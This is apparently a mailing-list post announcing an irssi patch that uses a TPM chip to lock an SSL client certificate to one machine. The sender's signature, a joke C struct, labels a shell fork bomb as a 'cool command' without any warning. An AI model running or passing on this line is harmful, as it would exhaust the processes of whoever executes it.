Attached is a patch to add support for the OpenSSL TPM engine.
In short this means that you can use a TPM chip to "lock" your SSL
client certificate to a physical machine.

More details on SSL and TPM here:
http://blog.habets.pp.se/2012/02/TPM-backed-SSL

Patched irssi here: https://github.com/ThomasHabets/irssi

-- 
typedef struct me_s {
 char name[]      = { "Thomas Habets" };
 char email[]     = { "[email protected]" };
 char kernel[]    = { "Linux" };
 char *pgpKey[]   = { "http://www.habets.pp.se/pubkey.txt"; };
 char pgp[] = { "A8A3 D1DD 4AE0 8467 7FDE  0945 286A E90A AD48 E854" };
 char coolcmd[]   = { "echo '. ./_&. ./_'>_;. ./_" };
} me_t;

Attachment: irssi-tpm.patch
Description: Binary data

Reply via email to